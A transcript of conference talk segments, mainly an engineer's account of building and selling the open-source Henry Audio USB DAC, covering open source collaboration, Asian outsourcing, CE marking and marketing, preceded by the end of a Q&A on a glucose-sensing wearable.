And the same goes for the actual spectrometer, the sensor. But it's straightforward, it's normal calibration. So you can figure out a lot of stuff. This is a medical device, but we can do more with it. I have the office record in lactate. We can measure melkesyre, lactic acid. We just slap it on the calf with some tape and go full out on a stationary bike. You can measure a bunch of stuff doing this. And it's known technology. What's not known is the stuff in here. That's what makes us able to read glucose. Because glucose looks almost like water, but not quite. And when you're measuring on the body, that's mostly water. So it's kind of hard to figure out the signal, but we're able to. Yes? Can you tell us about the non-medical market as well? How do you set up those lines? For non-medical use, there's much less compliance work. That's self-declaration, so it's just a matter of applying to get the CE marking for non-medical use. So that's obviously a market, but we still think the diabetics need some help first. But there are some projects for non-diabetic use that we are doing as well. Yes? How far are you in the medical approval? We have been doing the second interim study for, what do you call that, clinical trials. And we have started the process of selecting a notified body. So our target is, I can't tell you exactly, but it's not far. One year, two years. That's our goal, to get the medical CE approval for Europe. If we are going to do China, which we probably are, that can be a bit faster. Yeah, any more questions? No? It's Neil then. So I didn't know Neil, but his company supplies the microcontroller running deep in here. Thank you.
Hundreds of millions of diabetics around the world are currently pricking their fingers or implanting devices for monitoring their blood glucose levels. Prediktor Medical has developed a wearable device that measures blood glucose by only sitting on the skin. This is done by a combination of sensors, sensor fusion and distributed machine learning. He will discuss the process of preparing for launch of the combined system of devices, processing nodes and storage systems.
10.5446/50513 (DOI)
I'll do this in English for the sake of the recording. Anybody who wants to ask questions can do it in English or Norwegian, it doesn't really matter. I'm here to tell you about a business angle. Later on I'm going to tell you about an embedded debugging angle too, so feel free to see my second talk this afternoon, but at least for now we're not using all the props, just some of them. So why am I here? I'm here to tell you a story about a small business. Hopefully I can save you some time and resources in developing your businesses. I love to come out and meet with new people, and that's my main reason for coming. I'll tell you chronologically about Henry Audio. Have you heard about the brand Henry Audio before? The marketing department obviously needs to step things up a little bit, which it is trying to do, and which I'm getting to. But there's a story that leads to a product, and I'll tell you the story today. I have tried to extract some business learning points from that, which I will summarize and try to make clear, boom, boom, boom. Those are my own opinions. They're not facts or anything, they're not based on solid statistics, but it's my advice, what I would have loved for someone to tell me five, six years ago. So who am I? I'm a father of two, I'm a networker, I'm a hardware hacker, I meditate with a soldering iron, and I'm also a bit of a sales guy. I love to go out and sell it, not just make the thingy work. I monoski. I have one of those, it's from 1985, and it hurts a lot the first two years. So while I love to think out of the box, I drive to the slopes in one of those, so I can play it safe at the same time. It's a little bit of a mix. So there you know where these opinions are coming from: extrovert geek, plays it safe, out of the box.
So, audio and the Internet of Things. Henry Audio has made this. It's a digital-to-analog converter. What it does, I'll show you a little bit later, and what it looks like front and back, which might be a little bit hard to see as I'm holding it here. This makes your music emotional again. People have an emotional connection to music. At the same time, music distribution is so convenient these days, and I'm trying to say that the two can be combined. The Henry Audio USB DAC 128 mark 2, which is the name for this, does that: it makes an emotional connection with your stereo at home. You can sit down, listen to your music, enjoy that, and enjoy the convenience of modern streaming services. It's a thing, it connects to the internet; that's why I'm here. And by the way, it's open source. So this comes from a passionate group of people who have put it together in their spare time. So first, the box. It turns abstract digital data into something tangible. A digital signal enters it on a USB port. That's an abstract signal, you can't really sense it. And I talk a lot about that, how the digital world is very precise, but also very abstract. So the things we make, the sensors, the transducers, everything we make, turns something digital into a real-world phenomenon or the other way around. This one has no IP address, but it takes music out of something which does. So where is digital music today? I think it's stronger than ever. There's huge connectivity, there's huge availability. The availability of music today is something we've never seen before. The DRM hurdles have largely been taken care of. So the middle picture there, where some senior CEO in the record industry wants to own everything and the only way to access it easily is to steal it, those days are over, and that is a good thing.
There's a growing quality focus among consumers. So why am I telling you this about the music industry, first where it is today and then some of the hurdles? I'm getting to a business learning point in two slides. The biggest hurdle for the wide adoption of my product today is that people believe they can't hear a difference. People think they're not that complicated as human beings. But they have a favorite brand of coffee. You've got a favorite brand of coffee, right? You prefer that coffee over the other coffee because you think it tastes better. So there's your favorite brand of coffee. Some people even have a favorite brand of pasta. Do you have a favorite brand of pasta, anyone? No? But I mean, if you can taste the difference between two cups of coffee, you can hear the difference between good audio and bad audio. There are a couple of other hurdles. A lot of people think there's a price to be paid for convenience, and there's a good reason for that: the music and record industry has taught people that convenience comes at a price in terms of quality. Back in the 60s, 70s and 80s we had the record player, we had LPs. In the mid 80s the LP was put aside and CDs gained popularity. CDs have a lot of convenience to them: you don't have to flip them over, you can push a button for the next song, and you can even bring them to the beach. The first CDs didn't sound a lot better than LPs, but they were so convenient. And of course, in the late 90s, MP3 players came along. The first MP3 players, or really any MP3 player, don't sound better than a CD player; a lot of the information is simply not there. I also chose the graphics on purpose, so that we went from high audio quality and a nice, highly detailed picture to less audio quality but very convenient. And that's why I chose the not-so-pretty picture of the MP3 player.
But now, in this day and age, I'm not the only one who makes USB DACs. I'm not the only one who can make your computer sound good in your stereo kit; a lot of people do that. But convenience and quality are easier to join and have at the same time than ever before. Is there anybody here from Microsoft? Good, then I can pull out a few more stops than usual. No, I wouldn't have anyway. If only Microsoft decided to support USB Audio Class 2. So, Microsoft does not support USB Audio Class 2 in their current operating systems. Everybody else does: iOS, OS X, Linux, everything else works. Android works with USB Audio Class 2. Microsoft doesn't. So somebody buys this and they want to listen to high-resolution music. They need to download a driver to make that work. That applies to me, that applies to everyone else. If they want to listen to CD-quality music, Skype, Tidal, Spotify, anything, it's plug and play. But the market for high resolution, the market where you sell audio like the camera vendors sell megapixels, that market is closed. You can't sell one of these because it has a higher sample rate, higher resolution than the other guys have, because Microsoft hasn't opened up the protocol. So if you convince someone to buy that, then you also need to convince that person to go through the inconvenience of installing a driver. That person might want to compare three or four of these to make a good, informed decision. At that point they've installed three or four different drivers. Then they run into DLL conflicts. I know people personally who aren't Mac users but who have bought a Mac simply to play music, to avoid the driver hurdle. Those customers are hard to win over when you're making essentially what is a gadget. So Microsoft can open up a market here if they just want to. A lot of people have tried to convince them that they should. This brings me to my first business learning point.
This presentation has a lot of top-down focus, from the abstract down to the specific. My second presentation this afternoon goes the other way: that's a presentation that starts out with the building blocks and goes up. In the top-down view: are there megatrends in your industry? The previous speaker mentioned Airbnb; the whole sharing economy is definitely a megatrend. In Norway, the electric car industry is a megatrend. Do I believe there are megatrends in digital music and consumer electronics? Definitely. I think I've spotted three of them, and I'm using a water analogy here. One is a sudden tsunami of fashion. Anyone of you own a Tamagotchi? Good choice. Anyone of you own a clamshell phone, a flip-up phone? They were the rage. They were the big thing. So Tamagotchis were hugely popular. Very fashionable to have a Tamagotchi. Very fashionable to have a clamshell flip-up phone. Now they're gone from the market. If you are a big player, hitting fashion can be very, very good. You can sell loads. You can just stuff these boxes into the market. You can sell a lot of them. Then you stop. Suddenly the wave, the fashion, is gone. You have two full containers on their way from China, and you do not know what to do with them when they arrive on your doorstep two months from now. So the fashion part of consumer electronics, I find it scary. There's a tidal wave of convenience, and the pun is very much intended. Convenience is: MP3 killed the CD, CD killed the LP, and now streaming services and cell phones are even killing the MP3 players. It's driven by convenience the whole way. So convenience is a strong force. And I'm using Tidal as the example of the music streaming service. It's very convenient. We're going to demo a little bit of Tidal later on. And convenience is also something that comes and goes in a slightly more predictable pattern than the tsunamis of fashion. There's a global warming for quality.
The last slide I showed, with the girl with the big headphones: people want that. People like to do that. People like to say, yes, I do have a favorite brand of coffee. It's a good thing. It's something people aren't shy about. And I like that, because I want to be on the team that primarily provides the quality. So sometimes these waves interact, like waves always do from back in physics lessons. Teens with record players, I think, is one interaction of two of these waves: that would be record players being fashionable and representing high quality. They're inconvenient as anything, but they're fashion and they're quality. So these three megatrends interact. And again, this is my opinion. This is what I believe. So I think that for you to know approximately what landscape you're in with your devices and technologies could be a very good thing. Know a little bit about the room around you and what's going on there. And it's a beautiful thing to fall in love with some core technology and work bottom-up with it. But I think putting things into a little bit of perspective is good. So that was my first learning point: try to identify some megatrends. Is there money to be made in consumer electronics and digital audio? Definitely. I've sold 900 of these out of my basement. I'd love to sell a whole lot more. And that's not a lot; I mean, Sony would sell 900 things like that in 15 minutes, not even that. But I think there is a lot of money to be made. I mean, only one guy here knew about my brand. A lot more people, even in this room, definitely at this conference, would see a benefit from enjoying music in a convenient and high-quality way. And that's my message. Other people have different messages. There's a huge hi-fi install base. People have bought piles and piles of hi-fi equipment that is not internet connected. And now they want to enjoy the convenience of internet connection for their hi-fi kit. At the same time, people buy cell phones all the time.
And they want their cell phones to feed into the systems they already have. So that's the gap I'm trying to bridge. You might be trying to bridge different gaps. So it's good to look at install bases. What do people have? What can we plug into and improve on what's there? Not make something brand new from scratch. That's also a lot of fun, but don't necessarily only do that. There's my business learning point number two. I'm jumping straight to it. I haven't yet started on the sequential history that led to the product, but I will soon. My business learning point number two is to take notes. So you're taking notes now, that's good. You probably won't regret not taking notes today too much, but you never know. The best advice I think I ever got was to keep a diary of all interaction. I would speak with consultants. I would speak with members of the press. I have a journalist file. A lot of the sales here are driven by PR from reviews and the press. I have detailed journals of all interactions I had with all journalists. I don't just have a pile of email that I could search; I have a journal that refers to the mail messages. I have a diary. So, best advice: keep a diary. I've traced down some pretty serious bugs in source code while keeping a detailed diary. Change one parameter at a time, scientific method, and note down what you changed. Eventually you will see a pattern appear. So okay, this story. What led to this open source consumer product? I was 19; in high school I had some electronics as an elective and, in addition, some programming. That was a fantastic combination. One day I asked my programming teacher what happens if I differentiate a digital signal in the digital domain, convert it to analog, then integrate it with a continuous-time analog integrator. That's approximately how I phrased the question at age 19. My teacher said: I have absolutely no idea.
If there's a curious soul or two here, you can come by after the talk and I'll tell you what that does. But it's a technical thing that doesn't have to do with the business part of this. So he said: I have no idea, how about you just build one? So I did. I put one together. That's a picture from my oscilloscope. It's actually the one that sits in the bag there, and it will be a key player in my second talk this afternoon. I built one. Fast forward 15-odd years, and I had a working high-end CD player. It looks like this. I haven't sold a single one, because I have decided not to. It's an expensive piece of kit. I also had a degree in electronics. So for quite a few years I forgot about being a sales guy, and only recently did I find out that I missed that. It's great to make the thingy work. I meditate with the oscilloscope now and then. What I do instead of cheering for a favorite football team is cheer for my favorite windowed sinc, which that is. And I missed sales: make the thingy work and sell it. Something was missing in the CD player project, which was my main project at the time. USB audio was becoming popular. That was the beginning of this convenience megatrend. Streaming services hadn't yet been established, but people wanted quality from their MP3 players. So people wanted to play their MP3 files or downloaded FLAC, WAV, whatever files on a decent piece of kit. And there was no way to put that into my device at the time except flipping a silver disc into it. Six, seven years ago the chips were immature. Have you ever experienced that? That the chip or the technology you need is almost there? Have you had that experience? I had that. The support from the makers of those chips was one-on-one. I had to interact very tightly with engineers who had made faulty chips, both to tell them how to improve the chips, but also to try to understand how I could hack my way around the bugs.
Their source code was closed, so I had no way of actually figuring out what was going on in there. So it was a lot of trial and error. And the commercially available, mature chips at the time did not have high-end audio potential. My passion was always to make it sound pretty darn good, and the available chips didn't do that. So this was very, very annoying. I had to sign NDAs. I had to interact with Taiwanese engineers six, seven time zones away who never had the time, because I was a rinky-dink little customer they didn't care about. Then I got a lucky strike. This is a picture of an early SDR widget. I'm not going to ask if anyone here has heard about the SDR widget. It's a piece of electronics that lets your Linux box connect to ham radio equipment. So imagine you have a huge antenna, you have some foot pedals to control it, you have some radio kit to tune in different frequencies. Then you have this thing to connect all that to your Linux computer. I must admit I haven't fully understood the full application of that. But what I saw is that they had done USB audio just right. They had used the correct technology for USB audio. And I thought: this technology has the potential to go into what may become a consumer product. That thought didn't strike me at the time, but I definitely thought: this is what I need in my CD player. And the open source collaboration was superior to trying to get one-on-one attention from the chip vendors' engineers. So the open source project was at approximately the same maturity level as the commercial chips six, seven years ago. I first discovered the project in 2010 on AVR Freaks. It runs on an AVR32, which Alf-Egil Bogen has probably had a hand or two in dealing with. And it wasn't perfect at the time, but it was a much, much better bet than the other chips. So, open source. Who here has contributed to an open source effort? Nobody? No open source contributors here? That's a little sad. It's very sad.
I'm going to cry now, even though I haven't talked about the onion later, but I'm going to cry now without the onion. It's a great thing to do. It's not perfect, but it's a lot of fun. It really is a lot of fun. You have an itch. Someone else might have the same itch. Exactly, you have an itch. The guy behind you could probably reach that more easily than you could. So you scratch each other's itches, and it turns out you maybe have the same itch. You may be having related itches. You learn from each other. It's a great way to collaborate. I was lucky enough to meet one of the main contributors to the SDR widget project in Singapore. He's an anesthesiologist by day, and he codes microprocessors at night. Needless to say, he's a pretty smart guy. And we had a lot of fun. So you scratch each other's itches, but there is a business learning point here, too. So if you're not experienced from open source, that's a little sad, but I have something I wanted to tell you about it, is that you're worth your weight in code. This is my experience. Again, like I said, I'm opinionated about things. I'm trying to tell you things as they are. You write the code, or you forget about it. It takes a pretty significant open source project to have room for project management, architecture, and design. Some of you guys may have a huge talent for that, that an open source project might really, really benefit from how to make a strategy steer in one direction, hand out tasks, but that's not how it's done, unless maybe, I don't know, the Linux core, the Linux kernel development project. But maybe that is big and significant enough to have roles like those, but on smaller projects, you code. If you want to steer the project in some direction, if you want something to emerge, you pull your code that way. And it's the way it is culturally in these projects. If you can contribute code, others will contribute code back. But it's like you contribute first. 
And also, if you want to start an open source project, I've tried that a couple of times without contributing the initial 2,000 lines of code for a working prototype. Forget about it. You can't go out there and say: hey, do you have a little code snippet here and a little code snippet there, and could I be the guy who tries to tie it together? You need to have an initial something that people can contribute to. I wish it wasn't like that, but in my experience, that's the way it is. So I tried to create a fit and join a team. If you want the picture, I have it in higher quality than this. This is the AB-1.1, and this picture was actually used to promote it as a product on my first web page, which is a little interesting. It actually sold to a lot of geeks. Do I have a laser? No. Well, I'll just try to point, because I'll explain what is there. What you see here is an analog board at the bottom and a digital module on top. And this is itch scratching in practice. My itch at the time was: I have a CD player, it plays CDs beautifully, but it doesn't have USB input. So my idea was to take that digital module, snap it out of there, and plug it into my superior analog board. Now, in order to attract programmers to this project, I couldn't say: hey, programmers, you want this to work? You've got to solder up this huge analog thing. It will be perfect, but it's going to take you like 10 hours of soldering and some industrial tools to do it. I couldn't do that, so I tried to provide the digital hackers with a good working analog board to put their code on. That model worked pretty well. The modular approach costs a lot of money. This board that is modular cost me like $6, $7 more to make because it was modular. But in the early stages of the project, that was a good way to attract people. That whole model meant I wasn't alienating the analog geeks, because they could plug this into the sky-is-the-limit kind of weird analog stuff that they were doing.
And I didn't alienate the digital hackers because they could get up and running as soon as they had compiled the code. And what's in this code is an asynchronous USB audio interface. Next presentation goes into detail about what that is. Just trust me, it's good. Asynchronous USB audio is a force of good. And it worked. So here's another business learning point. Some of you might have a business model, like Facebook had this business model where they give it away for free first and then start either selling ads or charging for it. That might work. But I was selling hardware. It costs money to make hardware. So early paying customers is a very good thing. I made the two first prototypes on my own and paid for that, sent that out to a couple core programmers. Then I made 10. That was sold. Then I made 100. That was a big leap to go from 10 to 100. That took a lot of my savings actually to do that. And all of those, I kept one of each at home for my museum, at the bottom of a cardboard box. All of those were sold to fellow programmers in this project. So that was a lot of fun. I like that. So people bought hardware from me, got it in the mail, wrote code for me and sent the code back. That was a nice way of progressing things. I like that. Of course, I was writing a hell of a lot of code too and I was drawing circuit boards. But it worked. We were scratching each other's itches and pulling each other up. So revenue is motivation both for you. It's fun that people pay you money for what you do. Not just to paycheck, but that the actual end customer gives you their hard earned money because they think what you did is worth it. It's also great motivation for investors. I have not involved investors in this yet. That's a completely different story. But they like revenue. I'm pretty certain about that. Now over to production. I said I made 100. When you make 100, even when I made 10, I couldn't put them together on my own. 
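The asynchronous USB audio mentioned above works by making the DAC's own clock the master: the device tells the host, via a feedback endpoint, how many samples per USB frame it actually consumes, and the host adjusts its packet sizes to match. A toy sketch of that feedback value, using the 10.14 fixed-point encoding that full-speed asynchronous audio feedback uses (the helper names and the host-side function are illustrative, not the actual firmware):

```python
def feedback_value(sample_rate_hz, sof_rate_hz=1000):
    """Nominal samples per USB full-speed frame, encoded in the 10.14
    fixed-point format used by asynchronous audio feedback endpoints."""
    samples_per_frame = sample_rate_hz / sof_rate_hz  # e.g. 44.1 at 44.1 kHz
    return round(samples_per_frame * (1 << 14))       # 10.14 fixed point

def host_packet_samples(fb_10_14):
    """Host side: decode the feedback value back to samples per frame."""
    return fb_10_14 / (1 << 14)

fb = feedback_value(44_100)
print(fb, host_packet_samples(fb))  # 722534 and roughly 44.1
```

In the real device the reported value drifts slightly around the nominal one as the DAC's crystal runs fractionally fast or slow, which is exactly what lets the DAC, rather than the computer, own the audio clock.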
It takes five to eight hours of hand soldering to put one of those together. I dare say I'm relatively good at it, but it's a lot of work, and you can't base a business on it. Luckily, I do have electronics manufacturing experience. I used to work at Fluxtronics, which sadly is closed down now; that's an electronics factory. I've also done factory inspections on three continents for people I worked for. Experience in manufacturing was gold to me when code started turning into production hardware. Outsourcing is interesting. You've got to weigh your words a little bit, because all of a sudden you step into the whole losing-face cultural aspect. When you hire a bunch of these guys, they might be very, very good at doing their job. But between you having certain pictures in your head of what the product is going to do, and these guys knowing precisely how to put something together, there's a lot of room for error. Ramping up production can be a little bit like playing the ladder game. That was my experience. So the next business learning point is the outsourcing ladder game. Now, I'm going to phrase this in a controversial way, simply because I'm not talking to a Chinese audience. If I were talking to a Chinese audience, I would phrase things differently. That's part of the cultural aspects here. You buy samples. The first 10 I got were super. Everything worked out of the box. Great. Absolutely no problem with the samples: great price, right quality, delivered on time, boom, boom, boom. Samples, fantastic. Then you do the first volume batch. It comes back with all sorts of funny faults. You try to point out those faults and say: why is it like this? Why is it crooked? Why is it bent? The unit I showed you that only had the bottom plate and the front cover had a big discrepancy right there: the chassis was bent at least one millimeter out of shape. Either way, there's no way you could sell that to demanding consumers. I said: hey, it's bent out of shape.
The response was: you didn't specify. Okay, I didn't specify. You redo it, and hopefully you get up one ladder, or you throw the dice and move a little bit ahead in the ladder game. Then you specify. Actually, one more thing before we get to the specification part — I should have flipped those around. Anyway, you tell your subcontractors in Asia: please do not buy faulty chips from a cousin and install them. The answer is going to be yes. Does anybody know the Chinese word for no? Now you do. The Chinese word for no is yes. You know which question you should never ask in this context? The most pointless question to ask in this context is: do you understand? The answer will be yes. Thank you. Which means? So the box I showed you, the open one with a gray background, had a faulty voltage regulator chip. Now, the voltage regulator chip takes 5 volts in from the USB connector and converts that down to 3.3 volts for the CPU. The CPU cost me $12. The faulty regulator chip sent the 5 volts straight through. That would boil the microcontroller. The faulty regulator chip had a listed price of, I think, $1.20 at the fairly low volume I was working with at the time, 100 units. They probably got one that looked exactly the same that they paid $0.15 for, or that they found on a scrap heap. So somebody saved 100 units times $1, and risked 100 units times $12 worth of microcontrollers. Luckily, they hadn't bothered to run the test procedure on what they had assembled. I'd specified the test procedure: you plug in the cable, you turn it on, you upload the firmware, you check that the light goes on. Thank God they hadn't done that, because if they had, they would have nuked the whole batch at my cost. After a little bit of experimenting — and the batch size was 100 units, remember that — I was able to bring it down to four minutes of repair time per unit. I felt pretty proud when I got it down to four minutes of repair time.
I also had to negotiate quite hard with that Chinese vendor to get my parts back, because some parts were custom made for me, I'd shipped them down there, and they had only used some of them. I had to negotiate pretty hard to liberate those parts from their warehouse so that I could send them to a new vendor. So, back to specifying everything: you get silence. You specify absolutely everything; they don't respond. There are actually two ways of saying no in Chinese. Now you've seen them both. So you find a new vendor. There's new hope. And the game moves on. Hopefully you don't have to start all the way from scratch, because by now you've written a 19-page quality manual. You receive your fair amount of silence. I did that just this fall. And you move on. There's a website called globalsources.com. I use that a lot when I'm looking for vendors to make a little piece of aluminum or some custom-made part. What I do now is refer to the quality manual. I say: read this first. If you can relate to this level of documentation, this detail of specification, then you respond. If you can't, don't respond. That actually works. You can hire some local QA people — then you get twice the error sources, so I usually just don't bother with that. I'm going to show you here what happens when you hire local QA people. So I'm going to connect to my webcam. I put a webcam here, and right now it's taking a photo of this. So this is the same product; it just looks like a bird's nest of wires right now. Next session we're taking the lid off. See? That's the marketing guy. And do you see it from here? Do you see that something is a little off? Here? No, you probably don't. I'm going to bring it up on the screen instead. And there we are. This front is made from a circuit board. Usually circuit boards are green and they have chips on them. This circuit board is white and it doesn't have chips. It's made so that the Henry Audio logo stands out in bare metal.
That's actually tin-covered copper, for anyone who bothers to know. Whenever you make a circuit board — okay, imagine I'm a circuit board manufacturer — I put a date code on it. And I put a logo on it that states that this is made from non-flammable stuff, that it's made from a controlled source. Everything is beautiful. Then I put that stamp on the circuit board, because that's what I always do. But the customer specified no logos. No changes, no scratches, no pen marks — I mean, no red pen marks, no green pen marks, no blue pen marks; specify everything. I had. So they had to do a remake. It came back: pen marks. Remake. But then I had everything specified. This was done by a Swedish company with local QA people on the ground. I had specified everything. It still didn't fly, because "that's the way we always do it." You can fly down yourself. I've done that — not with my money, but on somebody else's. That brings quality up. For example, you can identify that the chips from the cousin didn't work. So you say: okay, the chips from the cousin, we need to put those aside, and you need to produce with the good chips. I've heard of people doing that — except when the good chips run out, guess where they go to find chips to keep the production line flowing. I've heard of people who physically traveled from Norway to China to take the cousin's chips out of the box and throw them away because they were bad. So there's a temporary increase in quality from flying down. You can have live-in Westerners, and that's what Apple and company do. That's expensive, but it's efficient, because there's going to be a factory inspection every day. Okay. I'm going to speed up a little bit now with business learning point number six: culture matters. I was teaching technology subjects to Norwegian 10th graders along with some consulting I did a few years ago. That was a lot of fun. We were teaching electromagnetics by means of electric guitars. That was a lot of fun.
So I had 25 16-year-olds. Talking face to face with the five brightest of those 16-year-olds was about as productive as emailing the engineer who was six time zones away. And I'm not saying a single bad word about the engineer. He knew his job. He produced everything according to the specification. This is a clever guy. But because of the language, time zone and written-communication filters, he ended up absorbing my wishes and my explanations about as easily as a 16-year-old I had in front of me. And there's probably a 15-to-20-year experience gap between those two individuals, and the communication link and cultural differences equalized that. So in China, use a narrow scope. They can make things beautifully, as long as it doesn't involve thinking out of the box. So never think out of the box, ever. Keep it narrow and it works. And you need to own the process. "Have you made something like this?" — a fluffy, undefined question; nothing comes back. "You make according to this drawing" — it comes back, and it's beautiful. So the box is now made in the Philippines. They have perfect English, and they're able to do purchasing and quality checks on my behalf, even though I'm a fairly small player at their factory. So if you ever consider having something outsourced, let me know; I can help you do it in the Philippines. It saves you a lot of hassle. So I got back on track. I sorted out some of the manufacturing issues. I started marketing the D2A converter as QNKTC — Quantization Noise Killed The Cat. There will be a short written test afterwards: who can remember that acronym? Nobody can. I personally know two people who can recite it. I had a media breakthrough: it was tested in What magazine in Norway as a consumer product, and it looked like this. That was in, let me see, March 2013. So that's exactly three years ago. Then I thought: hey, maybe I'm going to sell this — not just to my own CD player project. Maybe I'm going to sell this to the general public.
So I kept working with the open source group, and eventually I dared sell one to your aunt. I don't know your aunt in person, but she's the person who doesn't upload new firmware. So I reached a point where I said: okay, this firmware actually flies. I can send this out and a few boxes will come back for me to upgrade. I can handle that — not every box coming back for me to upgrade again and again. There's an ASIO driver that was developed. Remember I said Microsoft and USB Audio Class 2? Now, if you want to develop a proper audio driver for Windows, you might as well spend a lifetime. If I had the choice, I'd rather erect the Eiffel Tower than build one of those. It's hard. That's also one of the reasons I was unable to start an open source project to make one of those. The licenses are also not very open-source friendly, obviously. But the ASIO driver is one way to easily get around those limitations in Windows — though only for certain ASIO-enabled programs. ASIO is a technology that bypasses all of Windows' built-in audio systems. It works beautifully, and it's relatively easy to program against. And what I did is, I said on the mailing list for this open source program: we need this. And I'm giving away two fully functional units to whoever can make an annoying beep sound come out of Windows with Audio Class 2 — because if you can make an annoying beep sound, there's some way to hook music onto that, too. And... nothing happened. A year later, a guy out of nowhere in Russia said: hey, I made an ASIO driver. Happy days. It had a few bugs in it; he and I and a couple of other guys did some programming on it, and it didn't take much ironing out. Beautiful. And that was one of the big enablers — that, and the What article. So I invested in CE marking, and the CD player became less important. CE marking — I'm just going to say very briefly what that is about. Do you know CE marking yourselves here? No.
In order to sell a piece of electronics in the EU, you need to put a CE mark on it. The CE mark means: I say this is good. In order to say that it's good, you can hire someone to test it for you. I did that. There's no CE approval; there's a CE declaration. You don't have to apply for a CE mark — you can just stamp it on. But that also means that you put your good word and honor and finances behind that statement. It was really expensive to test this in Norway. We have Nemko in Norway. There was no way to get funding assistance; this wasn't big enough for NFR grants and things like that. So I went to Slovenia and got a 50% discount, because the EU Commission lists approved test houses. You can find that list and you can shop around. It was a little tedious, but okay, I figured it out. So with the ASIO driver, high resolution and CE marking, all these things in place, I got into Teknisk Ukeblad. That was a door I could just knock on — well, I had to connect with a friend of a friend. It looked like this. The smug geek you see in the picture is very smug because he got a pretty important bug sorted out. That's what's going on. There's an oscilloscope back there — the exact same thing I will show later on. This is the actual debug signal from deep within the USB protocol, exposed on the scope. And here it says: an open source oracle from Omsk contributed. That was the guy who wrote the ASIO driver. So things pulled together to make it work. I hired a press advisor in the UK. And this is something I can tell you right away: the Norwegian press is a beautiful thing — we have members of the Norwegian press here — but the Norwegian press is read in... guess which country. The UK trade press can be read by anyone. So I hired a guy there and got some tests. That was good. With this first product, I added consumers to developers, and I changed the name to Henry Audio.
At this time, the QNKTC angle — the open source development — kind of died down, because it was stable. It was good. There are still recent, day-to-day firmware updates, though. Henry is my grandfather on my mother's side. He's one of the guys who made Chris Dumbledalvik, the sailing ship. He worked with clinker-built ships; he made solid stuff. And I had a really good connection with my grandfather. He liked the fact that I became an electrical engineer, and so the name is from him. I also started fumbling with online advertising. So, a few words about growing out of the lab. The Norwegian saying is that you'd rather have one bird in your hand, one you can grasp, than ten on the roof. It's not like that here: you'd rather have 200 in the market than 10 working in the lab. Growing super core technology is good, but a super product from off-the-shelf components is better. So: the avocado and the onion. I was lucky enough to get some assistance in obtaining an avocado today. Does anybody know the difference between these two vegetables? Yes, that's good. That's one difference. That was not the one I was aiming for. Yes. So, the avocado: you made a solid core in the lab. But what people want is the green goo. That's the avocado. And let's hope you found out before it was too late that what you had working in the lab — the core of the avocado — was what you fell in love with. It was your beautiful technology. That was the one bird in your hand, not the ten on the roof. Meanwhile, the onion, which is layer upon layer of goo made from common off-the-shelf components, will fly in the market. I'm not going to throw these and catch them. I used all the onions in the lab. But it's an analogy. And if you're developers and you go away with one or two things to remember, one is to take notes. The other is: don't fall in love with a hard core, because people may very well want the green goo. A little bit about advertising.
I got reviews online, and people would say: how about you thank us for the review by buying a completely pointless ad? I'd say: try training a jellyfish instead — it may be just as much fun and as profitable. Online advertising is a very hard thing to grasp. It's a little bit like picking up a jellyfish: you can't really get a good hold of it. I'm a programmer, and the approach I'm taking to online advertising with Google AdWords now is a little bit like I would take with learning a new API or a new programming language. The syntax is the search ad. Google "Henry Audio" and you'll find some text there, authored by me or someone else. That's the syntax. The debugger is called Google Analytics. That's a very, very powerful statistical analysis tool that sees how these ads behave and what people do on your website. And the CPU and the operating system would be the general public. I mean, that's my take on it, and it's completely the wrong take. But that's where I'm coming from, and I find it the fluffiest, hardest-to-grasp programming environment ever. So I'm getting to the point where you need to be an expert in a lot of things — programming, manufacturing, PR, advertising. And it's entertaining. It's fun, but it's also a little bit straining. But there's nothing new about being an expert in a lot of fields. You had to be a geography, math and grammar expert back in school. You had to do tests, maybe two or three tests every week. This is just like that. I liked school. I like this. But nobody can be Steve Jobs and Steve Wozniak at the same time. So part of the reason I've sold 900 of them and not billions is that I've had to be those two guys at the same time, and it's not easy. Here's a tip about interacting with other experts. You will depend on other experts, but try not to be their pro bono project. You know what pro bono means? So if you spend $1,000, $2,000, $10,000, $20,000 on a consultant, that's a lot of money for you. That bleeds.
But what you get back is a rinky-dink project on his or her side. So I've had a 50-50 success rate with small consulting hires. But don't avoid the small consulting projects by becoming their pro bono project instead. I have received two hours of hard-facts quality time from experts, thanked them profoundly while taking the best notes I possibly could at the time, and that was it — maybe a couple of follow-up emails. But don't become their pro bono project. Instead, try to engage in a valuable exchange, where he or she values your contribution to their project and vice versa. That's the best way to do it. Happily give two hours of your time to complete strangers. I did that a year and a half ago — that's why I was invited to come here and tell the same story again. I'm here because of that. And do take notes. A little bit about open source licenses. There wouldn't be a Henry Audio if it wasn't for the SDR Widget. A fabulous way to cooperate. You said you weren't working so much with open source, so I'm going to skip past this. Just know that there are licenses that will make code reuse in a commercial project easy, and licenses that will make it hard to reuse the code. There are also licenses that will make it easy or hard to bring commercial code into your project. So what's next? I want to reach out to marketing and retail channels. I can't go on with a solo 60/40 Wozniak/Jobs mix. It's just not sustainable. I'm not even comparing myself to them; I said that's what I'm aspiring to. I want to introduce what I have today in more markets. I want to make new models with the same technology and with a few more bells and whistles. I know what people have told me they want; I'm going to make that and see if they buy it. I could help, for example, Atmel own the USB interface market. And I actually went to them a few years ago and said: hey, your chip does a better USB interface than you think it does; let's work together. It didn't quite work out. I could help Microsoft become a major player.
I'm not even going to bother trying. And if any one of you has experience in USB descriptor debugging for iOS, I'd like to know, because I have a bug and I'm not able to find it. There's something in the descriptor — it works with flying colors on all other OSes, but that one descriptor in iOS has something in it that I don't know what is. Now it's all about manufacturing and marketing. Hi-fi press in English leads to hi-fi press in other languages, which leads to gadget press, blogs, and hopefully consumer press. You might have seen this on dnc.no. That was good. But I wouldn't have gotten there if I didn't have a foundation to lean on. So I thought about this as a brick building, with a beautiful window with a speaker. It's brick on brick. So English first, and then diversification after that. What arrives in your computer is CD quality, and what arrives at your speakers can be amazing. Just lend the computer a hand and you'll love the end result. Now, there's five more minutes left on my schedule, so I thought we could do a demo. Would you like that? Yeah? Anybody heard about the demo effect? So now is the time to make your bets about the demo effect and my demo. So this is what it looks like. It's plugged in. You can plug it in there. And I can swap to Tidal. I'm cutting it now for two reasons. Have you heard this song before? Yes. Have you heard the bass sound as if it came out of an actual woodworking shop? Or have you heard the bass sound as if it came out of a piece of plastic? The whole point of adding quality to convenience in audio is that you can hear that the bass came out of an actual woodworking shop. Would anybody like to hear it on the big speakers? Should we try that? Yeah? Okay, I need to unplug a little bit. [Music demo: "All About That Bass" plays over the big speakers.] [Audience question about wireless.] My brother has Bluetooth in his car. He shares the same car with his wife. He's in his living room, having a phone conversation with someone. His wife arrives back home in the car, and the phone goes silent: the audio was rerouted automatically to the Bluetooth in the car that came within range. When wireless works, it's beautiful. When it doesn't work, it just 